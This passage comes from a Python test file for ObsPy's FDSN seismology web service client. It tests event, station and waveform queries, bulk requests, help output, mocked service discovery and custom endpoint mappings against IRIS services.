\"\"\"\n A Client initialized with _discover_services=False shouldn't perform\n any services/WADL queries on the endpoint, and should show only the\n default service parameters.\n \"\"\"\n client = Client(base_url=\"IRIS\", user_agent=USER_AGENT,\n _discover_services=False)\n assert client.services == DEFAULT_SERVICES\n\n def test_simple_xml_parser(self):\n \"\"\"\n Tests the simple XML parsing helper function.\n \"\"\"\n catalogs = parse_simple_xml(\"\"\"\n <?xml version=\"1.0\"?>\n <Catalogs>\n <total>6</total>\n <Catalog>ANF</Catalog>\n <Catalog>GCMT</Catalog>\n <Catalog>TEST</Catalog>\n <Catalog>ISC</Catalog>\n <Catalog>UofW</Catalog>\n <Catalog>NEIC PDE</Catalog>\n </Catalogs>\"\"\")\n assert catalogs == {\"catalogs\": set(\n (\"ANF\", \"GCMT\", \"TEST\", \"ISC\", \"UofW\", \"NEIC PDE\"))}\n\n def test_iris_example_queries_event(self):\n \"\"\"\n Tests the (sometimes modified) example queries given on the IRIS\n web page.\n\n Used to be tested against files but that was not maintainable. It\n now tests if the queries return what was asked for.\n \"\"\"\n client = self.client\n\n # Event id query.\n cat = client.get_events(eventid=609301)\n assert len(cat) == 1\n assert \"609301\" in cat[0].resource_id.id\n\n # Temporal query.\n cat = client.get_events(\n starttime=UTCDateTime(\"2001-01-07T01:00:00\"),\n endtime=UTCDateTime(\"2001-01-07T01:05:00\"), catalog=\"ISC\")\n assert len(cat) > 0\n for event in cat:\n assert event.origins[0].extra.catalog.value == \"ISC\"\n assert event.origins[0].time > UTCDateTime(\"2001-01-07T01:00:00\")\n assert UTCDateTime(\"2001-01-07T01:05:00\") > event.origins[0].time\n\n # Misc query.\n cat = client.get_events(\n starttime=UTCDateTime(\"2001-01-07T14:00:00\"),\n endtime=UTCDateTime(\"2001-01-08T00:00:00\"), minlatitude=15,\n maxlatitude=40, minlongitude=-170, maxlongitude=170,\n includeallmagnitudes=True, minmagnitude=4, orderby=\"magnitude\")\n assert len(cat) > 0\n for event in cat:\n assert event.origins[0].time > \\\n UTCDateTime(\"2001-01-07T14:00:00\")\n assert UTCDateTime(\"2001-01-08T00:00:00\") > event.origins[0].time\n assert event.origins[0].latitude > 14.9\n assert 40.1 > event.origins[0].latitude\n assert event.origins[0].latitude > -170.1\n assert 170.1 > event.origins[0].latitude\n # events returned by FDSNWS can contain many magnitudes with a wide\n # range, and currently (at least for IRIS) the magnitude threshold\n # sent to the server checks if at least one magnitude matches, it\n # does not only check the preferred magnitude..\n assert any(m.mag >= 3.999 for m in event.magnitudes)\n\n @pytest.mark.filterwarnings('ignore:.*cannot deal with')\n def test_irisph5_event(self):\n \"\"\"\n Tests the IRISPH5 URL mapping, which is special due to its custom\n subpath.\n \"\"\"\n client = Client('IRISPH5')\n\n # Event id query.\n cat = client.get_events(catalog='8A')\n assert len(cat) == 19\n assert cat[0].event_type == 'controlled explosion'\n\n def test_iris_example_queries_station(self):\n \"\"\"\n Tests the (sometimes modified) example queries given on IRIS webpage.\n\n This test used to download files but that is almost impossible to\n keep up to date - thus it is now a bit smarter and tests the\n returned inventory in different ways.\n \"\"\"\n client = self.client\n\n # Radial query.\n inv = client.get_stations(latitude=-56.1, longitude=-26.7,\n maxradius=15)\n assert len(inv.networks) > 0 # at least one network\n for net in inv:\n assert len(net.stations) > 0 # at least one station\n for sta in net:\n dist = 
locations2degrees(sta.latitude, sta.longitude,\n -56.1, -26.7)\n # small tolerance for WGS84.\n assert 15.1 > dist, \"%s.%s\" % (net.code, sta.code)\n\n # Misc query.\n inv = client.get_stations(\n startafter=UTCDateTime(\"2003-01-07\"),\n endbefore=UTCDateTime(\"2011-02-07\"), minlatitude=15,\n maxlatitude=55, minlongitude=170, maxlongitude=-170, network=\"IM\")\n assert len(inv.networks) > 0 # at least one network\n for net in inv:\n assert len(net.stations) > 0 # at least one station\n for sta in net:\n msg = \"%s.%s\" % (net.code, sta.code)\n assert sta.start_date > UTCDateTime(\"2003-01-07\"), msg\n if sta.end_date is not None:\n assert UTCDateTime(\"2011-02-07\") > sta.end_date, \\\n msg\n assert sta.latitude > 14.9, msg\n assert 55.1 > sta.latitude, msg\n assert not (-170.1 <= sta.longitude <= 170.1), msg\n assert net.code == \"IM\", msg\n\n # Simple query\n inv = client.get_stations(\n starttime=UTCDateTime(\"2000-01-01\"),\n endtime=UTCDateTime(\"2001-01-01\"), net=\"IU\", sta=\"ANMO\")\n assert len(inv.networks) > 0 # at least one network\n for net in inv:\n assert len(net.stations) > 0 # at least one station\n for sta in net:\n assert UTCDateTime(\"2001-01-01\") > sta.start_date\n if sta.end_date is not None:\n assert sta.end_date > UTCDateTime(\"2000-01-01\")\n assert net.code == \"IU\"\n assert sta.code == \"ANMO\"\n\n # Station wildcard query.\n inv = client.get_stations(\n starttime=UTCDateTime(\"2000-01-01\"),\n endtime=UTCDateTime(\"2002-01-01\"), network=\"IU\", sta=\"A*\",\n location=\"00\")\n assert len(inv.networks) > 0 # at least one network\n for net in inv:\n assert len(net.stations) > 0 # at least one station\n for sta in net:\n assert UTCDateTime(\"2002-01-01\") > sta.start_date\n if sta.end_date is not None:\n assert sta.end_date > UTCDateTime(\"2000-01-01\")\n assert net.code == \"IU\"\n assert sta.code.startswith(\"A\")\n\n def test_iris_example_queries_dataselect(self, testdata):\n \"\"\"\n Tests the (sometimes modified) example queries given on IRIS webpage.\n \"\"\"\n client = self.client\n\n queries = [\n (\"IU\", \"ANMO\", \"00\", \"BHZ\",\n UTCDateTime(\"2010-02-27T06:30:00.000\"),\n UTCDateTime(\"2010-02-27T06:40:00.000\")),\n (\"IU\", \"A*\", \"*\", \"BHZ\",\n UTCDateTime(\"2010-02-27T06:30:00.000\"),\n UTCDateTime(\"2010-02-27T06:31:00.000\")),\n (\"IU\", \"A??\", \"*0\", \"BHZ\",\n UTCDateTime(\"2010-02-27T06:30:00.000\"),\n UTCDateTime(\"2010-02-27T06:31:00.000\")),\n ]\n result_files = [\"dataselect_example.mseed\",\n \"dataselect_example_wildcards.mseed\",\n \"dataselect_example_mixed_wildcards.mseed\",\n ]\n for query, filename in zip(queries, result_files):\n # test output to stream\n got = client.get_waveforms(*query)\n # Assert that the meta-information about the provider is stored.\n for tr in got:\n assert tr.stats._fdsnws_dataselect_url == \\\n client.base_url + \"/fdsnws/dataselect/1/query\"\n # Remove fdsnws URL as it is not in the data from the disc.\n for tr in got:\n del tr.stats._fdsnws_dataselect_url\n expected = read(testdata[filename])\n # The client trims by default.\n _normalize_stats(got)\n assert got == expected, \\\n \"Dataselect failed for query %s\" % repr(query)\n # test output to file\n with NamedTemporaryFile() as tf:\n client.get_waveforms(*query, filename=tf.name)\n with open(tf.name, 'rb') as fh:\n got = fh.read()\n with open(testdata[filename], 'rb') as fh:\n expected = fh.read()\n assert got == expected, \\\n \"Dataselect failed for query %s\" % repr(query)\n\n def test_authentication(self, testdata):\n \"\"\"\n Test 
dataselect with authentication.\n \"\"\"\n client = self.client_auth\n # dataselect example queries\n query = (\"IU\", \"ANMO\", \"00\", \"BHZ\",\n UTCDateTime(\"2010-02-27T06:30:00.000\"),\n UTCDateTime(\"2010-02-27T06:40:00.000\"))\n got = client.get_waveforms(*query)\n expected = read(testdata[\"dataselect_example.mseed\"])\n _normalize_stats(got)\n assert got == expected, failmsg(got, expected)\n\n def test_iris_example_queries_event_discover_services_false(self):\n \"\"\"\n Tests the (sometimes modified) example queries given on the IRIS\n web page, without service discovery.\n\n Used to be tested against files but that was not maintainable. It\n now tests if the queries return what was asked for.\n \"\"\"\n client = Client(base_url=\"IRIS\", user_agent=USER_AGENT,\n _discover_services=False)\n\n # Event id query.\n cat = client.get_events(eventid=609301)\n assert len(cat) == 1\n assert \"609301\" in cat[0].resource_id.id\n\n # Temporal query.\n cat = client.get_events(\n starttime=UTCDateTime(\"2001-01-07T01:00:00\"),\n endtime=UTCDateTime(\"2001-01-07T01:05:00\"), catalog=\"ISC\")\n assert len(cat) > 0\n for event in cat:\n assert event.origins[0].extra.catalog.value == \"ISC\"\n assert event.origins[0].time > UTCDateTime(\"2001-01-07T01:00:00\")\n assert UTCDateTime(\"2001-01-07T01:05:00\") > event.origins[0].time\n\n # Misc query.\n cat = client.get_events(\n starttime=UTCDateTime(\"2001-01-07T14:00:00\"),\n endtime=UTCDateTime(\"2001-01-08T00:00:00\"), minlatitude=15,\n maxlatitude=40, minlongitude=-170, maxlongitude=170,\n includeallmagnitudes=True, minmagnitude=4, orderby=\"magnitude\")\n assert len(cat) > 0\n for event in cat:\n assert event.origins[0].time > \\\n UTCDateTime(\"2001-01-07T14:00:00\")\n assert UTCDateTime(\"2001-01-08T00:00:00\") > event.origins[0].time\n assert event.origins[0].latitude > 14.9\n assert 40.1 > event.origins[0].latitude\n assert event.origins[0].latitude > -170.1\n assert 170.1 > event.origins[0].latitude\n # events returned by FDSNWS can contain many magnitudes with a wide\n # range, and currently (at least for IRIS) the magnitude threshold\n # sent to the server checks if at least one magnitude matches, it\n # does not only check the preferred magnitude..\n assert any(m.mag >= 3.999 for m in event.magnitudes)\n\n def test_iris_example_queries_station_discover_services_false(self):\n \"\"\"\n Tests the (sometimes modified) example queries given on IRIS webpage,\n without service discovery.\n\n This test used to download files but that is almost impossible to\n keep up to date - thus it is now a bit smarter and tests the\n returned inventory in different ways.\n \"\"\"\n client = Client(base_url=\"IRIS\", user_agent=USER_AGENT,\n _discover_services=False)\n\n # Radial query.\n inv = client.get_stations(latitude=-56.1, longitude=-26.7,\n maxradius=15)\n assert len(inv.networks) > 0 # at least one network\n for net in inv:\n assert len(net.stations) > 0 # at least one station\n for sta in net:\n dist = locations2degrees(sta.latitude, sta.longitude,\n -56.1, -26.7)\n # small tolerance for WGS84.\n assert 15.1 > dist, \"%s.%s\" % (net.code, sta.code)\n\n # Misc query.\n inv = client.get_stations(\n startafter=UTCDateTime(\"2003-01-07\"),\n endbefore=UTCDateTime(\"2011-02-07\"), minlatitude=15,\n maxlatitude=55, minlongitude=170, maxlongitude=-170, network=\"IM\")\n assert len(inv.networks) > 0 # at least one network\n for net in inv:\n assert len(net.stations) > 0 # at least one station\n for sta in net:\n msg = \"%s.%s\" % (net.code, sta.code)\n 
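# the station epoch must fall inside the startafter/endbefore window requested above\n 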
assert sta.start_date > UTCDateTime(\"2003-01-07\"), msg\n if sta.end_date is not None:\n assert UTCDateTime(\"2011-02-07\") > sta.end_date, \\\n msg\n assert sta.latitude > 14.9, msg\n assert 55.1 > sta.latitude, msg\n assert not (-170.1 <= sta.longitude <= 170.1), msg\n assert net.code == \"IM\", msg\n\n # Simple query\n inv = client.get_stations(\n starttime=UTCDateTime(\"2000-01-01\"),\n endtime=UTCDateTime(\"2001-01-01\"), net=\"IU\", sta=\"ANMO\")\n assert len(inv.networks) > 0 # at least one network\n for net in inv:\n assert len(net.stations) > 0 # at least one station\n for sta in net:\n assert UTCDateTime(\"2001-01-01\") > sta.start_date\n if sta.end_date is not None:\n assert sta.end_date > UTCDateTime(\"2000-01-01\")\n assert net.code == \"IU\"\n assert sta.code == \"ANMO\"\n\n # Station wildcard query.\n inv = client.get_stations(\n starttime=UTCDateTime(\"2000-01-01\"),\n endtime=UTCDateTime(\"2002-01-01\"), network=\"IU\", sta=\"A*\",\n location=\"00\")\n assert len(inv.networks) > 0 # at least one network\n for net in inv:\n assert len(net.stations) > 0 # at least one station\n for sta in net:\n assert UTCDateTime(\"2002-01-01\") > sta.start_date\n if sta.end_date is not None:\n assert sta.end_date > UTCDateTime(\"2000-01-01\")\n assert net.code == \"IU\"\n assert sta.code.startswith(\"A\")\n\n def test_iris_example_queries_dataselect_discover_services_false(\n self, testdata):\n \"\"\"\n Tests the (sometimes modified) example queries given on IRIS webpage,\n without discovering services first.\n \"\"\"\n client = Client(base_url=\"IRIS\", user_agent=USER_AGENT,\n _discover_services=False)\n\n queries = [\n (\"IU\", \"ANMO\", \"00\", \"BHZ\",\n UTCDateTime(\"2010-02-27T06:30:00.000\"),\n UTCDateTime(\"2010-02-27T06:40:00.000\")),\n (\"IU\", \"A*\", \"*\", \"BHZ\",\n UTCDateTime(\"2010-02-27T06:30:00.000\"),\n UTCDateTime(\"2010-02-27T06:31:00.000\")),\n (\"IU\", \"A??\", \"*0\", \"BHZ\",\n UTCDateTime(\"2010-02-27T06:30:00.000\"),\n UTCDateTime(\"2010-02-27T06:31:00.000\")),\n ]\n result_files = [\"dataselect_example.mseed\",\n \"dataselect_example_wildcards.mseed\",\n \"dataselect_example_mixed_wildcards.mseed\",\n ]\n for query, filename in zip(queries, result_files):\n # test output to stream\n got = client.get_waveforms(*query)\n # Assert that the meta-information about the provider is stored.\n for tr in got:\n assert tr.stats._fdsnws_dataselect_url == \\\n client.base_url + \"/fdsnws/dataselect/1/query\"\n # Remove fdsnws URL as it is not in the data from the disc.\n for tr in got:\n del tr.stats._fdsnws_dataselect_url\n expected = read(testdata[filename])\n _normalize_stats(got)\n assert got == expected, \\\n \"Dataselect failed for query %s\" % repr(query)\n # test output to file\n with NamedTemporaryFile() as tf:\n client.get_waveforms(*query, filename=tf.name)\n with open(tf.name, 'rb') as fh:\n got = fh.read()\n with open(testdata[filename], 'rb') as fh:\n expected = fh.read()\n assert got == expected, \\\n \"Dataselect failed for query %s\" % repr(query)\n\n def test_conflicting_params(self):\n \"\"\"\n \"\"\"\n with pytest.raises(FDSNInvalidRequestException):\n self.client.get_stations(network=\"IU\", net=\"IU\")\n\n def test_help_function_with_iris(self, testdata):\n \"\"\"\n Tests the help function with the IRIS example.\n\n This will have to be adopted any time IRIS changes their\n implementation.\n \"\"\"\n try:\n client = self.client\n\n # Capture output\n tmp = io.StringIO()\n sys.stdout = tmp\n\n client.help(\"event\")\n got = sys.stdout.getvalue()\n 
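# restore the real stdout before comparing the captured help output\n 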
sys.stdout = sys.__stdout__\n tmp.close()\n filename = \"event_helpstring.txt\"\n with open(testdata[filename]) as fh:\n expected = fh.read()\n # allow for changes in version number..\n got = normalize_version_number(got)\n expected = normalize_version_number(expected)\n # catalogs/contributors are checked in separate tests\n assert got[-2].startswith('Available catalogs:')\n assert got[-1].startswith('Available contributors:')\n got = got[:-2]\n expected = expected[:-2]\n for line_got, line_expected in zip(got, expected):\n assert line_got == line_expected\n\n # Reset. Creating a new one is faster then clearing the old one.\n tmp = io.StringIO()\n sys.stdout = tmp\n\n client.help(\"station\")\n got = sys.stdout.getvalue()\n sys.stdout = sys.__stdout__\n tmp.close()\n\n filename = \"station_helpstring.txt\"\n with open(testdata[filename]) as fh:\n expected = fh.read()\n got = normalize_version_number(got)\n expected = normalize_version_number(expected)\n assert got == expected, failmsg(got, expected)\n\n # Reset.\n tmp = io.StringIO()\n sys.stdout = tmp\n\n client.help(\"dataselect\")\n got = sys.stdout.getvalue()\n sys.stdout = sys.__stdout__\n tmp.close()\n\n filename = \"dataselect_helpstring.txt\"\n with open(testdata[filename]) as fh:\n expected = fh.read()\n got = normalize_version_number(got)\n expected = normalize_version_number(expected)\n assert got == expected, failmsg(got, expected)\n\n finally:\n sys.stdout = sys.__stdout__\n\n def test_str_method(self):\n got = str(self.client)\n expected = (\n \"FDSN Webservice Client (base url: http://service.iris.edu)\\n\"\n \"Available Services: 'dataselect' (v1.0.0), 'event' (v1.0.6), \"\n \"'station' (v1.0.7), 'available_event_catalogs', \"\n \"'available_event_contributors'\\n\\n\"\n \"Use e.g. client.help('dataselect') for the\\n\"\n \"parameter description of the individual services\\n\"\n \"or client.help() for parameter description of\\n\"\n \"all webservices.\")\n got = normalize_version_number(got)\n expected = normalize_version_number(expected)\n assert got == expected, failmsg(got, expected)\n\n def test_dataselect_bulk(self, testdata):\n \"\"\"\n Test bulk dataselect requests, POSTing data to server. 
Also tests\n authenticated bulk request.\n \"\"\"\n clients = [self.client, self.client_auth]\n expected = read(testdata[\"bulk.mseed\"])\n # test cases for providing lists of lists\n # Deliberately requesting data that overlap the end-time of a channel.\n # TA.A25A..BHZ ends at 2011-07-22T14:50:25.5\n bulk = ((\"TA\", \"A25A\", \"\", \"BHZ\",\n UTCDateTime(\"2011-07-22T14:50:23\"),\n UTCDateTime(\"2011-07-22T14:50:29\")),\n (\"TA\", \"A25A\", \"\", \"BHE\",\n UTCDateTime(\"2010-03-25T00:00:00\"),\n UTCDateTime(\"2010-03-25T00:00:06\")),\n (\"IU\", \"ANMO\", \"*\", \"HHZ\",\n UTCDateTime(\"2010-03-25T00:00:00\"),\n UTCDateTime(\"2010-03-25T00:00:08\")))\n # As of 03 December 2018, it looks like IRIS is ignoring minimumlength?\n params = dict(quality=\"B\", longestonly=False, minimumlength=5)\n for client in clients:\n # test output to stream\n got = client.get_waveforms_bulk(bulk, **params)\n # Remove fdsnws URL as it is not in the data from the disc.\n for tr in got:\n del tr.stats._fdsnws_dataselect_url\n assert got == expected, failmsg(got, expected)\n # test output to file\n with NamedTemporaryFile() as tf:\n client.get_waveforms_bulk(bulk, filename=tf.name, **params)\n got = read(tf.name)\n assert got == expected, failmsg(got, expected)\n # test cases for providing a request string\n bulk = (\"quality=B\\n\"\n \"longestonly=false\\n\"\n \"minimumlength=5\\n\"\n \"TA A25A -- BHZ 2010-03-25T00:00:00 2010-03-25T00:00:04\\n\"\n \"TA A25A -- BHE 2010-03-25T00:00:00 2010-03-25T00:00:06\\n\"\n \"IU ANMO * HHZ 2010-03-25T00:00:00 2010-03-25T00:00:08\\n\")\n for client in clients:\n # test output to stream\n got = client.get_waveforms_bulk(bulk)\n # Assert that the meta-information about the provider is stored.\n for tr in got:\n if client.user:\n assert tr.stats._fdsnws_dataselect_url == \\\n client.base_url + \"/fdsnws/dataselect/1/queryauth\"\n else:\n assert tr.stats._fdsnws_dataselect_url == \\\n client.base_url + \"/fdsnws/dataselect/1/query\"\n # Remove fdsnws URL as it is not in the data from the disc.\n for tr in got:\n del tr.stats._fdsnws_dataselect_url\n assert got == expected, failmsg(got, expected)\n # test output to file\n with NamedTemporaryFile() as tf:\n client.get_waveforms_bulk(bulk, filename=tf.name)\n got = read(tf.name)\n assert got == expected, failmsg(got, expected)\n # test cases for providing a file name\n for client in clients:\n with NamedTemporaryFile() as tf:\n with open(tf.name, \"wt\") as fh:\n fh.write(bulk)\n got = client.get_waveforms_bulk(bulk)\n # Remove fdsnws URL as it is not in the data from the disc.\n for tr in got:\n del tr.stats._fdsnws_dataselect_url\n assert got == expected, failmsg(got, expected)\n # test cases for providing a file-like object\n for client in clients:\n got = client.get_waveforms_bulk(io.StringIO(bulk))\n # Remove fdsnws URL as it is not in the data from the disc.\n for tr in got:\n del tr.stats._fdsnws_dataselect_url\n assert got == expected, failmsg(got, expected)\n\n def test_station_bulk(self):\n \"\"\"\n Test bulk station requests, POSTing data to server. Also tests\n authenticated bulk request.\n\n Does currently only test reading from a list of list. 
The other\n input types are tested with the waveform bulk downloader and thus\n should work just fine.\n \"\"\"\n clients = [self.client, self.client_auth]\n # test cases for providing lists of lists\n starttime = UTCDateTime(1990, 1, 1)\n endtime = UTCDateTime(1990, 1, 1) + 10\n bulk = [\n [\"IU\", \"ANMO\", \"\", \"BHE\", starttime, endtime],\n [\"IU\", \"CCM\", \"\", \"BHZ\", starttime, endtime],\n [\"IU\", \"COR\", \"\", \"UHZ\", starttime, endtime],\n [\"IU\", \"HRV\", \"\", \"LHN\", starttime, endtime],\n ]\n for client in clients:\n # Test with station level.\n inv = client.get_stations_bulk(bulk, level=\"station\")\n # Test with output to file.\n with NamedTemporaryFile() as tf:\n client.get_stations_bulk(\n bulk, filename=tf.name, level=\"station\")\n inv2 = read_inventory(tf.name, format=\"stationxml\")\n\n assert inv.networks == inv2.networks\n assert len(inv.networks) == 1\n assert inv[0].code == \"IU\"\n assert len(inv.networks[0].stations) == 4\n assert sorted([_i.code for _i in inv.networks[0].stations]) == \\\n sorted([\"ANMO\", \"CCM\", \"COR\", \"HRV\"])\n\n # Test with channel level.\n inv = client.get_stations_bulk(bulk, level=\"channel\")\n # Test with output to file.\n with NamedTemporaryFile() as tf:\n client.get_stations_bulk(\n bulk, filename=tf.name, level=\"channel\")\n inv2 = read_inventory(tf.name, format=\"stationxml\")\n\n assert inv.networks == inv2.networks\n assert len(inv.networks) == 1\n assert inv[0].code == \"IU\"\n assert len(inv.networks[0].stations) == 4\n assert sorted([_i.code for _i in inv.networks[0].stations]) == \\\n sorted([\"ANMO\", \"CCM\", \"COR\", \"HRV\"])\n channels = []\n for station in inv[0]:\n for channel in station:\n channels.append(\"IU.%s.%s.%s\" % (\n station.code, channel.location_code,\n channel.code))\n assert sorted(channels) == \\\n sorted([\"IU.ANMO..BHE\", \"IU.CCM..BHZ\", \"IU.COR..UHZ\",\n \"IU.HRV..LHN\"])\n return\n\n def test_get_waveform_attach_response(self):\n \"\"\"\n minimal test for automatic attaching of metadata\n \"\"\"\n client = self.client\n\n bulk = (\"IU ANMO 00 BHZ 2000-03-25T00:00:00 2000-03-25T00:00:04\\n\")\n st = client.get_waveforms_bulk(bulk, attach_response=True)\n for tr in st:\n assert isinstance(tr.stats.get(\"response\"), Response)\n\n st = client.get_waveforms(\"IU\", \"ANMO\", \"00\", \"BHZ\",\n UTCDateTime(\"2000-02-27T06:00:00.000\"),\n UTCDateTime(\"2000-02-27T06:00:05.000\"),\n attach_response=True)\n for tr in st:\n assert isinstance(tr.stats.get(\"response\"), Response)\n\n @mock.patch(\"obspy.clients.fdsn.client.download_url\")\n def test_default_requested_urls(self, download_url_mock):\n \"\"\"\n Five request should be sent upon initializing a client. 
Test these.\n \"\"\"\n download_url_mock.return_value = (404, None)\n base_url = \"http://example.com\"\n\n # An exception will be raised if not actual WADLs are returned.\n try:\n Client(base_url=base_url)\n except FDSNException:\n pass\n\n expected_urls = sorted([\n \"%s/fdsnws/event/1/contributors\" % base_url,\n \"%s/fdsnws/event/1/catalogs\" % base_url,\n \"%s/fdsnws/event/1/application.wadl\" % base_url,\n \"%s/fdsnws/station/1/application.wadl\" % base_url,\n \"%s/fdsnws/dataselect/1/application.wadl\" % base_url,\n ])\n got_urls = sorted([_i[0][0] for _i in\n download_url_mock.call_args_list])\n\n assert expected_urls == got_urls\n\n @mock.patch(\"obspy.clients.fdsn.client.download_url\")\n def test_setting_service_major_version(self, download_url_mock):\n \"\"\"\n Test the setting of custom major versions.\n \"\"\"\n download_url_mock.return_value = (404, None)\n base_url = \"http://example.com\"\n\n # Passing an empty dictionary results in the default urls.\n major_versions = {}\n # An exception will be raised if not actual WADLs are returned.\n try:\n Client(base_url=base_url, major_versions=major_versions)\n except FDSNException:\n pass\n expected_urls = sorted([\n \"%s/fdsnws/event/1/contributors\" % base_url,\n \"%s/fdsnws/event/1/catalogs\" % base_url,\n \"%s/fdsnws/event/1/application.wadl\" % base_url,\n \"%s/fdsnws/station/1/application.wadl\" % base_url,\n \"%s/fdsnws/dataselect/1/application.wadl\" % base_url,\n ])\n got_urls = sorted([_i[0][0] for _i in\n download_url_mock.call_args_list])\n assert expected_urls == got_urls\n\n # Replace all\n download_url_mock.reset_mock()\n download_url_mock.return_value = (404, None)\n major_versions = {\"event\": 7, \"station\": 8, \"dataselect\": 9}\n # An exception will be raised if not actual WADLs are returned.\n try:\n Client(base_url=base_url, major_versions=major_versions)\n except FDSNException:\n pass\n expected_urls = sorted([\n \"%s/fdsnws/event/7/contributors\" % base_url,\n \"%s/fdsnws/event/7/catalogs\" % base_url,\n \"%s/fdsnws/event/7/application.wadl\" % base_url,\n \"%s/fdsnws/station/8/application.wadl\" % base_url,\n \"%s/fdsnws/dataselect/9/application.wadl\" % base_url,\n ])\n got_urls = sorted([_i[0][0] for _i in\n download_url_mock.call_args_list])\n assert expected_urls == got_urls\n\n # Replace only some\n download_url_mock.reset_mock()\n download_url_mock.return_value = (404, None)\n major_versions = {\"event\": 7, \"station\": 8}\n # An exception will be raised if not actual WADLs are returned.\n try:\n Client(base_url=base_url, major_versions=major_versions)\n except FDSNException:\n pass\n expected_urls = sorted([\n \"%s/fdsnws/event/7/contributors\" % base_url,\n \"%s/fdsnws/event/7/catalogs\" % base_url,\n \"%s/fdsnws/event/7/application.wadl\" % base_url,\n \"%s/fdsnws/station/8/application.wadl\" % base_url,\n \"%s/fdsnws/dataselect/1/application.wadl\" % base_url,\n ])\n got_urls = sorted([_i[0][0] for _i in\n download_url_mock.call_args_list])\n assert expected_urls == got_urls\n\n @mock.patch(\"obspy.clients.fdsn.client.download_url\")\n def test_setting_service_provider_mappings(self, download_url_mock):\n \"\"\"\n Tests the setting of per service endpoints\n \"\"\"\n base_url = \"http://example.com\"\n\n # Replace all.\n download_url_mock.return_value = (404, None)\n # Some custom urls\n base_url_event = \"http://other_url.com/beta/event_service/11\"\n base_url_station = \"http://some_url.com/beta2/stat_serv/7\"\n base_url_ds = \"http://new.com/beta3/waveforms/8\"\n # An exception will be 
raised if no actual WADLs are returned.\n try:\n Client(base_url=base_url, service_mappings={\n \"event\": base_url_event,\n \"station\": base_url_station,\n \"dataselect\": base_url_ds,\n })\n except FDSNException:\n pass\n expected_urls = sorted([\n \"%s/contributors\" % base_url_event,\n \"%s/catalogs\" % base_url_event,\n \"%s/application.wadl\" % base_url_event,\n \"%s/application.wadl\" % base_url_station,\n \"%s/application.wadl\" % base_url_ds,\n ])\n got_urls = sorted([_i[0][0] for _i in\n download_url_mock.call_args_list])\n assert expected_urls == got_urls\n\n # Replace only two. The others keep the default mapping.\n download_url_mock.reset_mock()\n download_url_mock.return_value = (404, None)\n # Some custom urls\n base_url_station = \"http://some_url.com/beta2/stat_serv/7\"\n base_url_ds = \"http://new.com/beta3/waveforms/8\"\n # An exception will be raised if no actual WADLs are returned.\n try:\n Client(base_url=base_url, service_mappings={\n \"station\": base_url_station,\n \"dataselect\": base_url_ds,\n })\n except FDSNException:\n pass\n expected_urls = sorted([\n \"%s/fdsnws/event/1/contributors\" % base_url,\n \"%s/fdsnws/event/1/catalogs\" % base_url,\n \"%s/fdsnws/event/1/application.wadl\" % base_url,\n \"%s/application.wadl\" % base_url_station,\n \"%s/application.wadl\" % base_url_ds,\n ])\n got_urls = sorted([_i[0][0] for _i in\n download_url_mock.call_args_list])\n assert expected_urls == got_urls\n\n def test_manually_deactivate_single_service(self):\n \"\"\"\n Test manually deactivating a single service.\n \"\"\"\n client = Client(base_url=\"IRIS\", user_agent=USER_AGENT,\n service_mappings={\"event\": None})\n assert sorted(client.services.keys()) == ['dataselect', 'station']\n\n @mock.patch(\"obspy.clients.fdsn.client.download_url\")\n def test_download_urls_for_custom_mapping(\n self, download_url_mock, testdata):\n \"\"\"\n Tests the downloading of data with custom mappings.\n \"\"\"\n base_url = \"http://example.com\"\n\n # More extensive mock setup simulating service discovery.\n def custom_side_effects(*args, **kwargs):\n if \"version\" in args[0]:\n return 200, \"1.0.200\"\n elif \"event\" in args[0]:\n with open(testdata[\"2014-01-07_iris_event.wadl\"], \"rb\") as fh:\n return 200, fh.read()\n elif \"station\" in args[0]:\n with open(testdata[\"2014-01-07_iris_station.wadl\"],\n \"rb\") as fh:\n return 200, fh.read()\n elif \"dataselect\" in args[0]:\n with open(testdata[\"2014-01-07_iris_dataselect.wadl\"],\n \"rb\") as fh:\n return 200, fh.read()\n return 404, None\n\n download_url_mock.side_effect = custom_side_effects\n\n # Some custom urls\n base_url_event = \"http://example.com/beta/event_service/11\"\n base_url_station = \"http://example.org/beta2/station/7\"\n base_url_ds = \"http://example.edu/beta3/dataselect/8\"\n\n # An exception will be raised if no actual WADLs are returned.\n # Catch warnings to avoid them being raised for the tests.\n with warnings.catch_warnings(record=True) as w:\n warnings.simplefilter(\"always\")\n c = Client(base_url=base_url, service_mappings={\n \"event\": base_url_event,\n \"station\": base_url_station,\n \"dataselect\": base_url_ds,\n })\n for warning in w:\n assert \"Could not parse\" in str(warning) or \\\n \"cannot deal with\" in str(warning)\n\n # Test the dataselect downloading.\n download_url_mock.reset_mock()\n download_url_mock.side_effect = None\n download_url_mock.return_value = 404, None\n try:\n c.get_waveforms(\"A\", \"B\", \"C\", \"D\", UTCDateTime() - 100,\n UTCDateTime())\n except 
Exception:\n pass\n assert base_url_ds in download_url_mock.call_args_list[0][0][0]\n\n # Test the station downloading.\n download_url_mock.reset_mock()\n download_url_mock.side_effect = None\n download_url_mock.return_value = 404, None\n try:\n c.get_stations()\n except Exception:\n pass\n assert base_url_station in download_url_mock.call_args_list[0][0][0]\n\n # Test the event downloading.\n download_url_mock.reset_mock()\n download_url_mock.side_effect = None\n download_url_mock.return_value = 404, None\n try:\n c.get_events()\n except Exception:\n pass\n assert base_url_event in download_url_mock.call_args_list[0][0][0]\n\n def test_redirection(self):\n \"\"\"\n Tests the redirection of GET and POST requests. We redirect\n everything if no authentication is used.\n\n IRIS runs three services to test it:\n http://ds.iris.edu/files/redirect/307/station/1\n http://ds.iris.edu/files/redirect/307/dataselect/1\n http://ds.iris.edu/files/redirect/307/event/1\n \"\"\"\n c = Client(\"IRIS\", service_mappings={\n \"station\":\n \"http://ds.iris.edu/files/redirect/307/station/1\",\n \"dataselect\":\n \"http://ds.iris.edu/files/redirect/307/dataselect/1\",\n \"event\":\n \"http://ds.iris.edu/files/redirect/307/event/1\"},\n user_agent=USER_AGENT)\n\n st = c.get_waveforms(\n network=\"IU\", station=\"ANMO\", location=\"00\", channel=\"BHZ\",\n starttime=UTCDateTime(\"2010-02-27T06:30:00.000\"),\n endtime=UTCDateTime(\"2010-02-27T06:30:01.000\"))\n # Just make sure something is being downloaded.\n assert bool(len(st))\n\n inv = c.get_stations(\n starttime=UTCDateTime(\"2000-01-01\"),\n endtime=UTCDateTime(\"2001-01-01\"),\n network=\"IU\", station=\"ANMO\", level=\"network\")\n # Just make sure something is being downloaded.\n assert bool(len(inv.networks))\n\n cat = c.get_events(starttime=UTCDateTime(\"2001-01-07T01:00:00\"),\n 